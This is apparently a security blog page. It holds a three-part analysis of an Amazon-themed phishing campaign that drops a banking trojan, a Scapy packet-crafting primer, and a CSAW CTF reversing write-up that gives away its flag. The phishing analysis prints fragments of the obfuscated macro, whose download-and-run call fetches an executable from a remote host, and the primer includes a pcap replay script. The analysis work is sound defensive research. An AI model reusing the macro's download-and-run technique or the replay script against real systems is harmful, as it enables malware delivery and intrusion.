Wednesday, December 3, 2014

Amazon Order Confirmation Phishing Campaign - Part III

In our previous post, we analyzed a malicious word document and it's associated macro. Our analysis revealed that this macro is used to retrieve a malicious executable file, 1.exe, which is then executed on the target system. Running Strings on the executable yielded information about the DLL libraries that were imported for use in this file. These libraries are associated with network communication which is very dangerous when it comes to any malware as it can be used for data exfiltration and retrieving additional resources from remote servers. Today we will examine this a bit further to see if we can retrieve any additional information.

1.exe Revisited

We discovered that many of the libraries imported were related to network communications. MPR.dll, WS2_32.dll and RTM.dll are all noteworthy when it comes to this functionality so the next step would be to see how these functions are used in the decompiled executable. Hopefully we can obtain some clues about the destination IP addresses that are being reached out to. We decided to use Hopper disassembler to decompile this executable.




Examination of the graph and code appears to indicate that this malware attempts to maintain a persistent process on the host system. This is done by checking to see if the malware's own process is running. If it doesn't, a new process is created for the malware. It also checks to see if the process is active or idle. The following is a small snippet of the decompiled code that demonstrates the idle process check.


This appears to be a common trait amongst most malware. Malicious software is not effective unless it continues to run on the system so we need to look at some other portions of the assembly code to get a better idea of how this malware will communicate with remote hosts.

Network communications appear to occur at memory location 0x00406230. At this location we begin to see interesting function calls such as 'getprotobyname', 'WSAGetServiceClassNameByClassIdW' and 'getservebyport'. One issue that we notice is there are no network indications such as an IP address or hostname. This limits our ability to see which destinations will be contacted by the malware. Our strings analysis led us to believe this would be the case but it is further confirmed as we look at the disassembled code.



So it appears that additional analysis will be needed to see exactly how this executable will interact with the system and network once it is executed. To do this we will need to perform some dynamic analysis on the executable. While we could normally run the executable in a secure lab environment, there are also open source tools that allow us to submit executables to be run in sandbox environment. We will opt to use a tool such as this since the infrastructure is already in place and we will not have to worry about any mishaps.

Dynamic Analysis

Malwr was chosen to perform the analysis for this piece of malware. It utilizes the Cuckoo Sandbox technology to perform dynamic analysis for files that have been submitted. Using this online services allows malware analysts to share results as well as check the analysis of other files as well. This is contingent upon having the hash value for that file we are looking to analyze and another analyst previously submitting the file. Let's take a look at the analysis that is provided to us for our own file which has been renamed to garfield67-1.exe.

Local Indicators

One particular area of interest when it comes to analyzing the consequences of running malware on a host would be any local changes made to the infected system. These files can be important for the purposes forensic investigation. Additional malware could also be downloaded to and executed on the host.

Edg1.tmp (md5:d41d8cd98f00b204e9800998ecf8427e), 2.tmp (md5:b396cb453ecc5d2949f6cb73c263e563) and GARFIE~1.exe (md5:954858bc0f115a4d6442afb333ec44c2) are particularly interesting. The first file would appear to be empty and returns no detections when submitted to Virus Total. The final two files have high detection rates. The GARFIE~1.exe is actually a copied version of the original malware executable.

Virus Total's vendor antivirus engines have commonly shown the name 'Dridex'. Dridex is a known Trojan that is classified as a "Banking Trojan" and has been linked to malicious macro use. Sound familiar?

Moving along, we also observed a good amount of registry changes including a modification to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. This will cause the malware to run each time a user logs in. This is quite common when it comes to malware as it needs to run after a user has logged off or shut down their system. Now that we have discovered some of local changes on a system, we know what indicators to look for in future incidents.

Network Indicators

In order to understand what type of network connections are being made we had to download the PCAP file from Malwr. One of the first things we noticed is an HTTP POST to destination host 84.40.9.34 over TCP port 8080. The posted information does not appear to be human-readable. It is possible that the data posted is encrypted but we have no real solid evidence to determine if this is the case.This HTTP POST results in a server response of 200 which is indicates a successful communication.



A quick WhoIs query for this IP address reveals that it is registered to a hosting company, Hostway Management, out of London. Hosting services are a common way to serve malware since it can allow a certain level of anonymity so this does not provide any further context in regards to the malware authors.

Next we see an HTTP GET request to host 198.57.157.49 which belongs to another hosting company out of Utah, USA


This request, however, is responded to with a 403 Forbidden message. This appears to be the only GET request within the entirety of the network traffic. All remaining activity looks very much like the initial POST request we observed, only this time it is to host 198.57.157.49. These requests, like the first, all appear to have possibly been encrypted and result in '200 OK' response codes.

Although we are unable to confirm, it would appear that this could be some form of data exfiltration as would be expected in information stealing malware. 

Conclusion

Analysis of the file clearly identifies the type of damage that mass phishing campaigns can cause, especially if they target certain industries.  Our initial Word attachment contained a malicious macro that lead to a quick downhill slide as it downloaded malware to the host. This infection vector may not be the most effective but it still works on many unsuspecting users by masquarading as a trusted company. 

We were able to obtain enough supporting indications that allow us to conclude that this malware is sending information from the host systems to a remote system. This could include any number of credentials or private information. Luckily, most antivirus vendors appear to have signatures in place for this activity and the network communications allow for IDS/IPS signatures to effectively detect and prevent outbound communications. The best prevention, however, would be to disallow the running of Macros for Microsoft documents.  


1.exe Malwr Analysis

Resources:
Trend Micro - Banking Trojan Dridex Uses Macros for Infection
My Online Security - Amazon Co UK Order Dispacthed


Part One
Part Two


Wednesday, November 19, 2014

Amazon Order Confirmation Phishing Campaign - Part II

In the last post I reviewed a phishing campaign that used spoofed Amazon.co.uk confirmation emails to bait recipients in to opening a Word doc attachment. This attachment contained a malicious macro that would download malware on to the host system. Now we are going to look a bit deeper by performing some static analysis on the document and the malware that is loaded on to the host system. Doing so will give us some insight in to nature of these files, besides simply being malicious, and what we can expect these files to do once they are executed.

Word Attachment

Let us take a take a look at the .doc file that is attached to the email. Upon opening the file, we notice that it is completely blank. We do receive a warning about enabling macros, however.


Since we only want to analyze this file, there is no need to enable the macros. We only want to view the macros in this file. I personally decided to use the Microsoft VBS editor that comes with Microsoft Office to analyze the code. The code can be found here at Pastebin and appears to have a lot of non-useful code segments such as conditional statements that will never execute. This is likely a type of obfuscation that the author decided to use in order to throw off those viewing the actual VBScript.

After wading through the obfuscation, we find what appears to be some relevant lines of code.

Function SICJGWUTEZO(ByVal IYDOISAYNTH As String, ByVal PAUINJYOMZI As String) As Boolean
    Dim JGNEZQPKOWX As Object, ZSIJJVHVMOQ As Long, LSCOYILUQNP As Long,     
APXADSKJDFK() As Byte
    Set JGNEZQPKOWX = CreateObject("MSXML2.XMLHTTP")
    JGNEZQPKOWX.Open "GET", IYDOISAYNTH, False
    JGNEZQPKOWX.SEND "send REQUEST"

The code snippets above appears to show an outbound HTTP GET request to a remote host. The only problem is that we don't know what the remote host is in this case. It appears that the variable 'IYDOISAYNTH' is the remote host here. This variable is a parameter that is defined for function 'SICJGWUTEZO'. The only other instance of this function being called occurs here:

    SICJGWUTEZO ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(103) & ChrW(97) & ChrW(114) & ChrW(102) & ChrW(105) & ChrW(101) & ChrW(108) & ChrW(100) & ChrW(54) & ChrW(55) & ChrW(46) & ChrW(100) & ChrW(101) & ChrW(47) & ChrW(49) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101), Environ("TEMP") & "\SUVCKSGZTGK.exe"

Decoding the ChrW values reveals http//garfield67.de/1.exe as the file that the HTTP GET request resource. That is very interesting but not all that surprising. Running the address through Virus Total produces a detection rate of 16/61.


We need to analyze this file if we want to determine how it will modify the host system. While the macro provides a great deal of information, it is essentially a way to infect the system.

1.exe

So I feel that I should start this section out by first stating that the executable is no longer available. At some point it was taken down, likely because this server was hosting malicious content and they don't tend to last all that long.

This first thing we are going to do is determine if this file is actually and executable. It is not uncommon for malicious files to have extensions that are different from their actual file type. This doesn't seem like a good case to do such a thing but let's do our due diligence anyway.


Everything here appears to indicate that this is indeed an executable file. The file command indicates this and as we would expect the 'MZ' value if found at the beginning of the hex dump. Using strings does not yield any useful information such as hard coded IP addresses or credentials. One piece of valuable information that we can extract from the strings of the executable would be the DLL libraries that are imported for use by the executable. This can be done using a tool like IDA Pro as well but for the purposes of brevity the strings output is as follows:


A little Googling reveals that the majority of these libraries are used for network-based communications. This would indicate that the malware has networking capabilities and will attempt to reach out to remote hosts.  More digging in to the binary is needed so that we can accurately identify how this malware will communicate. This will require that we use some more advanced analysis techniques and will be the subject of our next post.


Part One
Part Three

Wednesday, November 12, 2014

Amazon Order Confirmation Phishing Campaign

Recently a new phishing campaign has been brought to my attention. I have been noticing a high number of downloads from hosts for executables. This activity is causing snort-based signatures to fire when these downloads are attempted. After a little investigation, I found that a good bit of people are receiving these phishing emails which contain an attachment. This attachment appears to be the stimulus for the downloads we are observing.

Some Google searching returns a number of articles about this ongoing campaign. My Online Security provides us with the actual email that is being distributed to potential victims.

Examining the email, it appears to be legitimate, but there are a few key indications that something is wrong. The most noticeable indication is the broken English in the email.
Dear Customer,
Greetings from Amazon.co.uk,
We are writing to let you know that the following item has been sent using  Royal Mail.
For more information about delivery estimates and any open orders, please visit: http://www.amazon.co.uk/your-account
Your order #203-2083868-0173124 (received October 30, 2014)

Your right to cancel:At Amazon.co.uk we want you to be delighted every time you shop with us.  O=ccasionally though, we know you may want to return items. Read more about o=ur Returns Policy at:  http://www.amazon.co.uk/returns-policy/
Further, under the United Kingdom's Distance Selling Regulations, you have =the right to cancel the contract for the purchase of any of these items wit=hin a period of 7 working days, beginning with the day after the day on whi=ch the item is delivered. This applies to all of our products. However, we =regret that we cannot accept cancellations of contracts for the purchase of= video, DVD, audio, video games and software products where the item has be=en unsealed. Please note that we are unable to accept cancellation of, or r=eturns for, digital items once downloading has commenced. Otherwise, we can= accept returns of complete product, which is unused and in an "as new" con=dition.
Our Returns Support Centre will guide you through our Returns Policy and, w=here relevant, provide you with a printable personalised return label.  Ple=ase go to http://www.amazon.co.uk/returns-support to use our Returns Suppor=t Centre.
To cancel this contract, please pack the relevant item securely, attach you=r personalised return label and send it to us with the delivery slip so tha=t we receive it within 7 working days after the day of the date that the it=em was delivered to you or, in the case of large items delivered by our spe=cialist couriers, contact Amazon.co.uk customer services using the link bel=ow within 7 working days after the date that the item was delivered to you =to discuss the return.
https://www.amazon.co.uk/gp/css/returns/homepage.html
For your protection, where you are returning an item to us, we recommend th=at you use a recorded-delivery service. Please note that you will be respon=sible for the costs of returning the goods to us unless we delivered the it=em to you in error or the item is faulty. If we do not receive the item bac=k from you, we may arrange for collection of the item from your residence a=t your cost. You should be aware that, once we begin the delivery process, =you will not be able to cancel any contract you have with us for services c=arried out by us (e.g. gift wrapping).
Please also note that you will be responsible for the costs of collection i=n the event that our specialist courier service collect a large item from y=ou to return to us.
As soon as we receive notice of your cancellation of this order, we will re=fund the relevant part of the purchase price for that item.=20
Should you have any questions, feel free to visit our online Help Desk at:==20http://www.amazon.co.uk/help
If you've explored the above links but still need to get in touch with us, =you will find more contact details at the online Help Desk.=20
Note: this e-mail was sent from a notification-only e-mail address that can=not accept incoming e-mail. Please do not reply to this message.=20
Thank you for shopping at Amazon.co.uk
-------------------------------------------------Amazon EU S.=C3=A0.r.L.c/o Marston GateRidgmont, BEDFORD MK43 0XPUnited Kingdom-------------------------------------------------
I will admit that I can't honestly remember the last time I actually read a confirmation email after making a purchase on Amazon. To me, this would suggest that it is conceivable that an unsuspecting recipient would not recognize this as a phishing attempt. I can also say that I also have never received a confirmation email with an attachment. This email, however, has an attached Microsoft Word document.

This .doc file (md5: a75e196e6c0cabc145f4cdc3177e66ec) appears to contain some macro that causes the system that it is executed on to make download requests. The intent here is that an individual will open the document, disable the macro security features that are presented when the file is opened and execute the VB script. It is common for a unsuspecting user to click past any warnings in documents such as these and the perpetrators are very aware of this.




This macro appears to lead to the download the file "1.exe" (md5: 954858bc0f115a4d6442afb333ec44c2) on to the host system. Once this file is executed...well let's just say all sorts of fun things begin to happen that we will explore further in the following posts. Running this executable through Virus Total produces a detection rate of 35/54. The name classifications continuously mention the name "Yakes" as the type of malware

In the following posts I will analyze the downloaded malware, Word document and any additional files that may be dropped on to the host system. Performing these steps will hopefully lead to additional information such as the origin of the campaign and the purpose of the malware.

Part Two
Part Three

Sunday, October 19, 2014

Scapy Primer - Part III

The ability to read from and write to files is extremely helpful when it comes to programming and scripting. This ability allows users to either store or read data from a pre-existing source. Where this becomes helpful with a library such as Scapy is that it allows us to read from a packet capture file (pcap). The scenarios in which this type of activity is advantageous would be when a programmer needs process the network traffic that has already occurred. This is a useful ability when we need to analyze, search or replay network traffic.

Here are a few of the methods that are used in order to read from or write to a pcap file.

rdpcap()

Reading packets from a pcap file requires the use of the rdpcap() method. This method requires a file location as a parameter. The best way to ensure that the proper file is given as input is to provide the full path to the file within double quotes.

Let's take a look at an example in which we will attempt to read the file "/tmp/synflood.pcap":


The pcap contains a Syn-Flood attempt. This is a denial of service (DoS) attack that attempts to send a high number of SYN flags to an open port to illicit a SYN/ACK response. This would be an expected response from an open port per the three-way handshake. The source, 192.168.10.1, is spoofed so that any responses are sent in to the void. This attack is antiquated and typically does not work against modern hosts.

packets = rdpcap("/tmp/synflood.pcap")

This line reads each packet in the in the the variable as a list. Checking the variable 'packets' results in a listing that shows 100 packets, which is to be expected as a result of original PCAP.

wrpcap()

Writing packets to a pcap file is very similar to the write process with the exception of the number of parameters that we will provide. The parameters are the file location and the packets that are to be written to file.

The ability to write packets is very much tied to the ability to collect the packets that are to be written to file. Up until this point we have only explored how to collect traffic that has been produced in response to certain stimuli that the programmer has created. This obviously has certain limits when it comes to the types of traffic that we can collect. Now we will explore one additional method that can be used to collect all traffic that passes a network interface card.

sniff()

The sniff() method will sniff traffic from a network interface card of the host machine which the method is being run on. Of course this means that the user running the method should have the ability to read traffic from the network card in promiscuous mode. The sniff() method can take multiple parameters that can specify the type and quantity of traffic it receives.

     iface  - This option specifies the interface that traffic will be collected on.
          
     filter  - This option takes a Berkley Packet Filter in order to limit the type of traffic that is
                  collected.
     count - This option specifies the number of packets that will be collected.




It is not a requirement that the packets sniffed are then stored in a pcap file. They can be read in to a variable as well but for the sake of persistence and relevance, sniffed traffic will be written to file in our examples. Sniffing traffic in this fashion is helpful when we have some idea of the type of traffic we are seeking.

Replay

There may be scenarios where we would like to replay traffic from a pcap file. Research, investigation and malware analysis are a few that come to mind. These situations can benefit from replaying packets in a lab environment.  Scapy makes this a relatively simple task to achieve.

So if we want to replay some traffic on the network. It only takes a few lines of code to do this.

from scapy.all import *
pcap = '/tmp/attack.pcap' 

traffic = rdpcap(pcap)


for packet in traffic: 
     sendp(packet)


We use the sendp() function in this script since the traffic in the pcap contains Layer 2 data. Recall that we previously stated that this function must be used when the packet contains Ethernet level data.

This will allow us to replicate this traffic on a test network, provided that test hosts have network settings that have been modified to match IP addresses in the file. This could save some time when we would like to determine if our systems are vulnerable to certain attacks. Just get a pcap, replay the traffic and observe what happens.

Conclusion

This primer only touches the surface of the possibilities of Scapy. The main purpose was to show just some of the features and abilities. This tool will be used in future posts because it is a great for automating tasks and researching responses from networking devices. It also will provide great benefits for reconnaissance and evasions techniques. A more full featured set of documentation can be found at  http://www.secdev.org/projects/scapy/files/scapydoc.pdf.

Thursday, October 16, 2014

Scapy Primer - Part II

Obviously if we create a packet, the next logical step would be to send that packet over the network to a destination. This is a necessary step, especially when attempting to analyze the response to a crafted packet. Since crafting packets allows us to deviate from protocol and RFC standards, an unexpected or unique response may be received. This is a useful technique when it comes to fingerprinting and troubleshooting a host. There are other useful applications when analyzing the response to these crafted packets as well.

Packet Trasmission

A number of functions are available for transmitting packets. The following functions are the most noteworthy and useful.

send()

The send() function is used to send a packet over a network. This function is typically used when we do not want to store the response for further use in the script or program.

     >>> packet = IP(dst="10.10.10.1")/TCP(dport=80)
     >>> ans = send(packet)
     .
     Sent 1 packets.
     >>> ans
     >>>

Notice that no value is returned as a response to the sent packet so the result of printing the variable 'ans' is an empty one.

Let's use tcpdump to get a more detailed picture of what is happening on the network when we use the send() function.


We receive a SYN/ACK as expected since destination port 80 is open on host 10.10.10.1. The host that initiated the conversation, 192.168.93.136, responds to the SYN/ACK with a RST packet. This is due to Scapy making the initial request and not the Linux Kernel. Since this is the case the host does not expect to receive a SYN/ACK, thus it responds with a RST packet.

sr()

The sr() function is very much similar to send(). The difference between the two functions is that sr() will return an answer to the stimulus packet that has been sent. For example, if we were to send an ICMP request to a destination, this function would listen and store the responses within a list that can be enumerated. Unanswered packets will also be returned using sr().

    >>> packet = IP(dst="10.10.10.1")/TCP(dport=80)/"Open Port"
    >>> ans,unsans = sr(packet)
    Begin emission:
    .Finished to send 1 packets.
    *
    Received 2 packets, got 1 answers, remaining 0 packets
    >>> ans
    <Results: TCP:1 UDP:0 ICMP:0 Other:0>
    >>> ans[0]
    (<IP  frag=0 proto=tcp dst=10.10.10.1 |<TCP  dport=http |<Raw  load='Open Port' |>>>,   
    <IP  version=4L ihl=5L tos=0x0 len=40 id=31 flags= frag=0L ttl=64 proto=tcp   
    chksum=0x5a98 src=10.10.10.1 dst=10.0.2.15 options=[] |<TCP  sport=http dport=ftp_data 
    seq=448001 ack=2 dataofs=5L reserved=0L flags=A window=65535 chksum=0xb94d 
    urgptr=0 |<Padding  load='\x00\x00\x00\x00\x00\x00' |>>>)
    >>> packet = IP(dst=["10.10.10.101","10.10.10.251"])/ICMP()/"Ping"
    >>> ans,uans = sr(packet)
    Begin emission:
    .Finished to send 2 packets.
    **
    Received 3 packets, got 2 answers, remaining 0 packets
    >>> ans
    <Results: TCP:0 UDP:0 ICMP:2 Other:0>
    >>> uans
    <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>
    
Now let's access the elements within this list. We would do this just like any other list in Python. The integer within the brackets represents the index of the stimuli/response pair we would like to access. In this example the first pair is an echo request (Type 8 Code 0) and the echo reply (Type 0) to the original request.

    >>> ans[0]
    (<IP  frag=0 proto=icmp dst=10.10.10.101 |<ICMP  |<Raw  load='Ping' |>>>, <IP  
    version=4L ihl=5L tos=0x0 len=32 id=55 flags= frag=0L ttl=63 proto=icmp chksum=0x5b29 
    src=10.10.10.101 dst=10.0.2.15 options=[] |<ICMP  type=echo-reply code=0 chksum=0x412f 
    id=0x0 seq=0x0 |<Raw  load='Ping' |<Padding  load='\x00\x00\x00\x00\x00\x00\x00\x00\x00
    \x00\x00\x00\x00\x00' |>>>>)

The second pair is the echo request and the ICMP destination unreachable/host unreachable from the gateway (Type 3 Code 1). The host 10.10.10.251 does not exist which is why this response is generated. We are only concerned with these responses for this illustration so the IP and ICMP errors can be ignored at this time.

    >>> ans[1]
    (<IP  frag=0 proto=icmp dst=10.10.10.251 |<ICMP  |<Raw  load='Ping' |>>>, <IP   
    version=4L ihl=5L tos=0xc0 len=60 id=56 flags= frag=0L ttl=63 proto=icmp 
    chksum=0x5a4c src=10.10.10.101 dst=10.0.2.15 options=[] |<ICMP  type=dest-unreach 
    code=host-unreachable chksum=0xdd1f unused=0 |<IPerror  version=4L ihl=5L tos=0x0 
    len=8192 id=256 flags=  frag=0L ttl=63 proto=icmp chksum=0x59c9 src=10.0.2.15
    dst=10.10.10.251 options=[]
    |<ICMPerror  type=echo-request code=0 chksum=0x392f id=0x0 seq=0x0 |<Raw  load='Ping'
    |>>>>>)


The list that is returned as a result of this function is actually multidimensional. We will only explore the first two dimensions but it should be noted that there are many more. Each dimension allows us to dive down deeper in to the packet. We will access the second dimension in the following example. This index relates to the particular transaction that we are interested in accessing within the pair. In this case we will be examining the second ICMP request that was sent to host 10.10.10.251.

 
   >>> ans[1][0]
    <IP  frag=0 proto=icmp dst=10.10.10.251 |<ICMP  |<Raw  load='Ping' |>>>
    >>> ans[1][0].type
    8
    >>> ans[1][0].code
    0

sr1()

The sr1() function is another variation of the send() function. This function listens for a single response to a packet that has been sent. This is quite useful if we are only concerned with the first response to a packet that has been sent. Unanswered packets are stored within a list as well.


     >>> packet = IP(dst="10.10.10.1")/TCP(dport=22,flags="S")

     >>> ans = sr1(packet)
     Begin emission:
     Finished to send 1 packets.
     *
     Received 1 packets, got 1 answers, remaining 0 packets

We define a packet that is destined for TCP port 22 (Secure Socket Layer) and has a TCP flag that is set to 'S' for SYN. This should initiate the beginning of the TCP handshake and elicit a SYN/ACK flag from the destination host if the port is open.

     >>> ans
     <IP  version=4L ihl=5L tos=0x0 len=44 id=86 flags= frag=0L ttl=64 proto=tcp
     chksum=0x5a5d src=10.10.10.1 dst=10.0.2.15 options=[] |<TCP  sport=ssh dport=ftp_data
     seq=10624001 ack=1 dataofs=6L reserved=0L flags=SA window=65535 chksum=0x5b2f
     urgptr=0 options=[('MSS', 1460)] |<Padding  load='\x00\x00' |>>>
     >>> ans[0][1]
     <TCP  sport=ssh dport=ftp_data seq=10624001 ack=1 dataofs=6L reserved=0L flags=SA
     window=65535 chksum=0x5b2f urgptr=0 options=[('MSS', 1460)] |<Padding  load='\x00\x00'
     |>>
     >>> ans[0][1].flags
     18L



Keep in mind that the variable 'ans' stores the response to the 'packet' that was sent. 'ans[0][1]' specifies the second layer in this response packet. In our case, this would be the TCP layer. When we request the 'flags' field we are presented with the integer '18'. This is the combined value of the TCP flags (ACK = 16, SYN = 2).


srp()

The srp() function is used when sending a layer 2 (data link layer) datagram packet and will listen for responses in much the same way as the previous function does.

     >>> datagram =  
     Ether(src="00:00:00:12:34:ab",dst="14:da:e9:01:3e:23")/IP(dst="10.10.10.101")
     >>> sendp(datagram)
     .
     Sent 1 packets.

This function must be used if the Ether() layer has been defined within a packet. If a function such as send() is used, a warning will be produced indicating that there is an issue.

     >>> send(datagram)
     WARNING: Mac address to reach destination not found. Using broadcast.
     .
     Sent 1 packets.

Now that we have a foundation for crafting and transmitting packets, we can look in to actually reading packets from a packet capture file. This is a tremendously helpful capability when attempting to reproduce activity such as an exploit or attack on a network. We will explore these techniques as well as a few other in next post.

Wednesday, October 15, 2014

Scapy Primer


Networking is a fundamental knowledge area when it comes to effectively investigating, analyzing and researching the vast majority of security-related topics and events. This makes a lot of sense considering that most computers are on a network, such as the internet, for communication purposes. It is likely that when a system has been attacked and/or compromised, it was done so remotely as opposed to locally. Obviously this is just a result of the way our computers communicate these days. Tools and frameworks that are specifically focused on networking are very useful in this type of environment.

Scapy is a packet manipulation library that has the ability to craft, manipulate and even replay packets on the wire. It can be used either in scripts, programs or interactively at the command line. Obviously this has many practical uses when it comes to both network and security-related research/investigation.  Before we can practically use this tool, a little primer is in order to get a feel for the library and it's capabilities. This is not meant to be a full manual but rather a quick start guide.

Packet Creation

Scapy allows a packet to be created using layers much in the way that they are logically layered in the same way that the OSI and TCP/IP models. You can even go as far as adding additional layers to a packet, although it really wouldn't make a lot of sense and the response may be unpredictable. A remote host wouldn't really understand a packet that has multiple IP layers since it is an abnormal condition. This could be useful if we are looking for a certain response but it is not likely to yield any useful information.

So let's say I want to send a packet to a remote host to confirm if it is running an SMTP (Simple Mail Transfer Protocol) server. SMTP runs on TCP port 25 by default although this isn't a requirement. Let's take a look at how to create a packet for this purpose.

Here are the characteristics of the packet we would like to create:

Source Host:         192.168.93.134
Source Port:          1025
Destination Host: 192.168.93.136
Destination Port:  25

This packet can be created one of two ways. One way is more compact than the other but we will review both.

Method One

The first method is the longest since creation of each layer is performed within a separate declaration.

First, let us define the network layer (Layer 3).

     >>> l3 = IP(dst="192.168.93.134",ttl="128")

Next, we define the transport layer (Layer 4)

      >>> l4 = TCP(sport=1025,dport=25)

Then, we will define the payload that we plan to deliver to the destination.

      >>> data = "Testing"

In this case, we are not using a true SMTP value but a plain-text string.

Now we will combine all three layers in to a single packet. The layers are 'layered' on top of one another using the '/' operator.

      >>> packet = l3/l4/data

Any undefined values such as source host, flags or TCP Options are set to defaults values. The same is true for layers such as the data link layer. These default values can be obtained by using the following notation within interactive mode:
    
     ls(protocol)
     >>> ls(IP)

After a packet has been created, it can be reviewed by simply typing the variable name at the command prompt. This will show the user-defined values of the packet.

     >>> packet
     <IP  frag=0 ttl='128' proto=tcp dst=192.168.93.134 |<TCP  sport=1025 dport=smtp |<Raw  
      load='Testing' |>>>

While the first method provides a more detailed way to craft a packet, the same crafting can also be done in a single line of code. The first method has certain advantages such as reuse of the layer definitions in multiple packet creation. In other words, if we want to change the value at one layer, such as the transport layer, we can change the value of that single layer instead of having to redefine the entire packet.



Method Two

The second method is great for quick packet creation and brevity. All components of the packet can be defined at a single time. Let's take a look at the creation of the same packet that we created in the above section using this shorter method.

Once again, here are the characteristics of the packet we would like to create:

     Source Host:         192.168.93.134
     Source Port:          1025
     Destination Host: 192.168.93.136
     Destination Port:  25

     >>> packet = IP(dst="192.168.93.134",ttl="128")/UDP(sport=1025,dport=25)/"Testing"

This saves us a few lines of code. Let's take a look at the packet.

     >>> packet
     <IP  frag=0 ttl='128' proto=udp dst=192.168.93.134 |<UDP  sport=1025 dport=25 |<Raw  
      load='Testing' |>>>

Packet Details

While packet creation is a great feature, we need a way to extract information from this packet. This includes information such as IP address, port, data, flags and a ton of other header information from each individual layer. 

Scapy provides the following methods for extraction of this information:

getlayer()

Using the getlayer() method will retrieve information pertaining to a single layer of a packet. This information includes non-default fields within the layer.

haslayer()

The haslayer() method allows the programmer to check to see if a layer exists. If the value exists, a '1' will be returned. If it does not exists, a '0' will be returned.

show() 

The show() method can be used to display information about the packet. This is helpful mainly while in interactive mode. It will display a more human friendly view of the packet fields. It will show both user-defined and default values.

The value of a packet header value can be retrieved using the following syntax:

     packet.layer.fieldname

Note:  Requesting flag values will result in a decimal representation of the flags that are set so it
 is up the the programmer to interpret these values to with their associated flag values.

That concludes the basic overview of the packet creation process but there are additional features that we will need to cover before we can begin utilizing Scapy. These features include methods that are used for packet transmission, sniffing and file I/O. While this section is a good launching point, further explanation is needed before any relevant tasks can be performed using Scapy.

Wednesday, October 1, 2014

CSAW 2014 Reverse Engineering Challenge

Recently I have been competing in a number of InfoSec Capture the Flag competitions with a group of friends and co-workers. The most recent competition was the Polytechnic Institute of New York University's annual CSAW CTF (https://ctf.isis.poly.edu/). This annual, jeopardy-style competition hosts a qualification round that is open to high school students, college students and industry professionals.

During this competition, I focused on the Reverse Engineering category of challenges. The following writeup is for the 200 point category Reverse Engineering challenge. The file can be downloaded here:

https://www.dropbox.com/s/5p2v89z0mlvae2i/csaw2013reversing2.exe?dl=0

I start by running the strings command on the executable file. The motive here is to see if I am able to find any clues or even the flag itself. Using this command can also give a pretty good indication of whether or not the file is actually an executable or has another type of file embedded within it. The results of this command do not yield any valuable clues leading to the discovery of the challenge flag.

The string 'Flag' is present within the output but submitting "RSDS" does not result in success:


One point of interest that I notice is that there are some strings that are related to date information so it's possible this could be a clue:


Maybe the flag can only be obtained when the operating system clock is a certain time, however, more investigation is still needed.

All other human-readable strings appear to be standard Windows API function calls so further analysis is required. I will try to run the file so that I can get a good idea of what it is actually doing and possibly find additional clues. Execution of the file results in a text box pop-up with what appears to be ciphertext.


Pressing any of the three buttons results in the pop-up closing as well as the program.

It would appear that using some basic techniques to analyze this file aren't likely to yield a flag for this challenge. That being the case, it looks like it's time to break out the disassembler and debugger. I prefer to use IDA Pro and OllyDbg but other alternatives are available as well.

Disassembling the program in IDA Pro shows a number of functions, many of which are standard Microsoft DLL functions. The functions names were also present as a result of the strings program output. IDA assigns the function name 'Sub_401000' to the function starting at location 0x401000. This appears to show some promise in regards to finding a solution for this challenge.

Sub_401000 Graphical View

The instructions in the graph indicate that there are two "for loops" in this particular function. There is a notable 'XOR' instruction within the second loop that looks like it could be used for some sort of encryption or decryption. Values are then popped off of the stack and returned.

Looking at these instructions can be a bit of a struggle so utilzing OllyDbg could be helpful in order to see what values are being modified and returned after these loops have concluded.  Let's start by running the program using the debugger.

In order to see what occurs at the end of the second "for loop" a breakpoint should be set within OllyDbg at the 'POP EDI' instruction. So I run the program with the breakpoint set and hit the jackpot:

     Note: It can take some searching to find the location since the program may
     load at a different memory offset in IDA and OllyDbg.

Once the EDI register is popped off the stack, the following ASCII string is found:

"flag{reversing_is_not_that_hard!}"

Submission of this string results in a "Congratulations" message. 

The entire challenge required using both basic and advanced techniques of file analysis. This appears to have been a pretty straightforward reversing challenge but knowing where to look is vital to successful completion.